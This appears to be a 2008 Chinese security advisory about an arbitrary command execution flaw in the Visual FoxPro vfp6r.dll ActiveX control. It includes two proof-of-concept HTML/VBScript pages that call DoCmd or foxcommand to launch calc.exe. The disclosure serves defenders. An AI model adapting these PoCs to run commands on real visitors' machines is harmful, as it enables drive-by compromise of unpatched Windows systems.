安全研究
安全漏洞
Microsoft Visual FoxPro vfp6r.dll ActiveX控件任意代码执行漏洞
发布日期:2008-01-09
更新日期:2008-01-21
受影响系统:
Microsoft Visual FoxPro 6.0描述:
BUGTRAQ ID: 27205
Visual FoxPro是微软发布的数据库开发工具。
Visual FoxPro的vfp6r.dll ActiveX控件没有正确地验证对foxcommand()或DoCmd()方式的输入参数,如果用户受骗访问了恶意站点的话,就可能导致执行任意指令。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/28417/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution</b>
url: http://www.microsoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Not much more to say than using "DoCmd()" function, you can run
applications passed as argument.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:008B6010-1F3D-11D1-B0C8-00A0C9055D74' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.DoCmd "RUN calc.exe"
End Sub
</script>
</span></span>
</code></pre>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Microsoft VFP_OLE_Server Remote Command Execution</b>
url: http://www.microsoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Not much more to say than using "foxcommand()" function, you can
run applications passed as argument.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:A7CD2320-6117-11D7-8096-0050042A4CD2' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.foxcommand "RUN calc.exe"
End Sub
</script>
</span></span>
</code></pre>
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:2650
严重程度:0(网友投票)
绿盟科技给您安全的保障